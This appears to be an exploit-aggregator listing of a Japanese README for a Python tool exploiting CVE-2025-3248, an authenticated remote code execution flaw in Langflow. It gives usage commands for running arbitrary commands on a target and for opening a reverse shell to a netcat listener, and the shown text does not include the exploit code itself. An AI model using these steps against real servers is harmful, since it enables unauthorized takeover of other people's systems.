Sploitus

Exploit for RCE

kitploit · 2026-08-19

Exploit Code

MARKDOWN109 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TIEMIO-RCE-CVE-2025-3248
# 認証済みCVE-2025-3248 Langflowリモートコード実行

このPythonスクリプトは、**CVE-2025-3248** を悪用して、脆弱性のあるシステム上で任意のコマンドを実行したり、リバースシェルを生成したりします。このエクスプロイトを使用するには**認証が必要です** 。

* * *

## 特徴

  * **認証済みコマンド実行:** ターゲット上で任意のシステムコマンドを実行します。
  * **リバースシェル:** リスナーにリバースシェルを生成します。
  * **プロキシサポート:** プロキシ(例:Burp Suite)を介してリクエストをルーティングします。



* * *

## 必要条件

  * Python 3.x
  * `requests` ライブラリ



依存関係は次のコマンドでインストールします:

root@kitploit:~
    
    
    pip install requests
    

* * *

## 使用方法

root@kitploit:~
    
    
    python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
    

### 引数

* コマンド(`-c`)またはリバースシェル用の`--lhost`と`--lport`の両方を指定する必要があります。

* * *

### 使用例

#### 1\. コマンドの実行

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com -l admin -p password -c "id"
    

#### 2\. リバースシェルの取得

あなたのマシンでリスナーを起動します:

root@kitploit:~
    
    
    nc -lvnp 4444
    

次に実行します:

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
    

#### 3\. プロキシの使用

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
    

* * *

## Dockerイメージ

### イメージのデプロイ

次のコマンドでDockerイメージをデプロイできます:

root@kitploit:~
    
    
    podman compose up -d
    

イメージは`http://localhost:7860`で利用可能になります。 composeファイルのクレジット: このリポジトリ

* * *

## 免責事項

このスクリプトは**教育および許可されたペネトレーションテスト** の目的のみで使用してください。 所有していない、または明示的な許可を得ていないシステムに対して使用しないでください。

* * *

このREADMEはAIによって生成されました。